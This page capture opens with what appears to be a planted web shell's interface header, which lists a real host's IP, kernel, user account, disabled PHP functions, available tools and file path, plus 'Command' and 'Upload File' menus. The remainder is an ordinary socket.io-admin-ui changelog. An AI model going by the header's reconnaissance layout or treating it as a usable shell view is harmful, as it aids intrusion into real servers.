Server IP : 92.205.26.207 / Your IP : 216.73.216.16 Web Server : Apache System : Linux 207.26.205.92.host.secureserver.net 4.18.0-553.60.1.el8_10.x86_64 #1 SMP Thu Jul 10 04:01:16 EDT 2025 x86_64 User : zikryat ( 1002) PHP Version : 8.3.23 Disable Function : exec,passthru,shell_exec,system MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0755) : /home/zikryat/public_html/node_modules/@socket.io/admin-ui/ |
[ Home ] | [ C0mmand ] | [ Upload File ] |
---|
## [0.5.1](https://github.com/socketio/socket.io-admin-ui/compare/0.5.0...0.5.1) (2022-10-07) ### Bug Fixes * **server:** handle late HTTP server binding ([b21b649](https://github.com/socketio/socket.io-admin-ui/commit/b21b649ea246eec87af121ffe676c876b001de05)) * **server:** properly track events with acknowledgement ([6d58a75](https://github.com/socketio/socket.io-admin-ui/commit/6d58a755b4d692970d3f2066903a4d503f334f0a)) # [0.5.0](https://github.com/socketio/socket.io-admin-ui/compare/0.4.0...0.5.0) (2022-09-19) ### Features * **server:** switch to the bcryptjs module ([81af1d4](https://github.com/socketio/socket.io-admin-ui/commit/81af1d40ae91b6f83e45b505a609b7ec25a75115)) * **ui:** add tr locale ([#52](https://github.com/socketio/socket.io-admin-ui/issues/52)) ([7e36532](https://github.com/socketio/socket.io-admin-ui/commit/7e365322421bbfd28f01ad8a1065025ede054ecf)) * **ui:** update ko locale ([#51](https://github.com/socketio/socket.io-admin-ui/issues/51)) ([2226f7b](https://github.com/socketio/socket.io-admin-ui/commit/2226f7bcd97461902f9dac4f44a7ed62f804f188)) # [0.4.0](https://github.com/socketio/socket.io-admin-ui/compare/0.3.0...0.4.0) (2022-06-23) ### Bug Fixes * **ui:** properly set initial nav drawer state ([77ee068](https://github.com/socketio/socket.io-admin-ui/commit/77ee0683185aceababc4439a3a945e273d547944)) ### Features * add page displaying all events ([481ef22](https://github.com/socketio/socket.io-admin-ui/commit/481ef22b3aff37b40b142a29cb78e116d6d1e8e9)) * add production mode ([e0d91ca](https://github.com/socketio/socket.io-admin-ui/commit/e0d91cadb11205c5f2c686c239a50cb2eef9795d)) * display sent and received events ([8542601](https://github.com/socketio/socket.io-admin-ui/commit/8542601b55022f6ca00b677b7d7c7664a326526f)) * **ui:** add support for relative links ([fdec2ce](https://github.com/socketio/socket.io-admin-ui/commit/fdec2ce17bf7cad77a04e8eef42a26104b6a05b8)) * **ui:** separate the namespace from the server URL ([5a8a75e](https://github.com/socketio/socket.io-admin-ui/commit/3d4aed972f16dad3dd847d61f4db5e6f55978c4b)) # [0.3.0](https://github.com/socketio/socket.io-admin-ui/compare/0.2.0...0.3.0) (2022-05-03) ### Features * add navigation drawer for mobile devices ([#31](https://github.com/socketio/socket.io-admin-ui/issues/31)) ([62e1467](https://github.com/socketio/socket.io-admin-ui/commit/62e146709f1b4ceee86b6c9d414d0538b2991833)) * add socket data in the UI ([#37](https://github.com/socketio/socket.io-admin-ui/issues/37)) ([3773fe4](https://github.com/socketio/socket.io-admin-ui/commit/3773fe4b1cbf2206708e1f21ce65f430a522527f)) * add support for the msgpack parser ([4359536](https://github.com/socketio/socket.io-admin-ui/commit/4359536a4b9c09395c52ac7e983123f02043ac5c)) * **ui:** improve Bengali (বাংলা) translation ([#27](https://github.com/socketio/socket.io-admin-ui/issues/27)) ([925c617](https://github.com/socketio/socket.io-admin-ui/commit/925c617af10996b7e31709d74afb340701104fc0)) # [0.2.0](https://github.com/socketio/socket.io-admin-ui/compare/0.1.2...0.2.0) (2021-06-11) ### Features * **ui:** add Bengali (বাংলা) translation ([#18](https://github.com/socketio/socket.io-admin-ui/issues/18)) ([b9c09f4](https://github.com/socketio/socket.io-admin-ui/commit/b9c09f4c7d690c13c662e734ad6b142af3d9dfef)) * **ui:** add pt-BR locale ([#13](https://github.com/socketio/socket.io-admin-ui/issues/13)) ([e8d05bd](https://github.com/socketio/socket.io-admin-ui/commit/e8d05bd11833c21d65055a92c0ab21973c515052)) * display the real IP address of the user ([#16](https://github.com/socketio/socket.io-admin-ui/issues/16)) ([2e05f70](https://github.com/socketio/socket.io-admin-ui/commit/2e05f706c62792f9d497910bdabb44d12292c806)) ## [0.1.2](https://github.com/socketio/socket.io-admin-ui/compare/0.1.1...0.1.2) (2021-06-02) ### Bug Fixes * **server:** add support for dynamic namespaces ([74f1c20](https://github.com/socketio/socket.io-admin-ui/commit/74f1c20f6ad878c3d11c5fc80dd8d12ee02d7bfb)) * **server:** only serialize required handshake attributes ([1cf991e](https://github.com/socketio/socket.io-admin-ui/commit/1cf991e49a1e2b172acca40ca3d259dad9c22915)) * **ui:** allow to specify the connection path ([7ad384d](https://github.com/socketio/socket.io-admin-ui/commit/7ad384dd3485b8500217a489f8a376d2641d81e0)) ## [0.1.1](https://github.com/socketio/socket.io-admin-ui/compare/0.1.0...0.1.1) (2021-05-09) ### Bug Fixes * **ui:** allow to connect to a websocket-only server ([3ec64a6](https://github.com/socketio/socket.io-admin-ui/commit/3ec64a62d331c5100c026313700119a4a97df64a)) * **ui:** set withCredentials to true ([51fac0a](https://github.com/socketio/socket.io-admin-ui/commit/51fac0aeb8ae2cfb6fa319525de9b1208aada463)) # [0.1.0](https://github.com/socketio/socket.io-admin-ui/compare/0.0.1...0.1.0) (2021-05-04) ### Features * **locale:** add ko locale ([#1](https://github.com/socketio/socket.io-admin-ui/issues/1)) ([16a1da5](https://github.com/socketio/socket.io-admin-ui/commit/16a1da57362b87de64508b7595d94096d4f2b47d)) * **locale:** add zh-CN locale ([#2](https://github.com/socketio/socket.io-admin-ui/issues/2)) ([9612bc6](https://github.com/socketio/socket.io-admin-ui/commit/9612bc6f212c0364c2a6ce27fa20ec873a2041fe))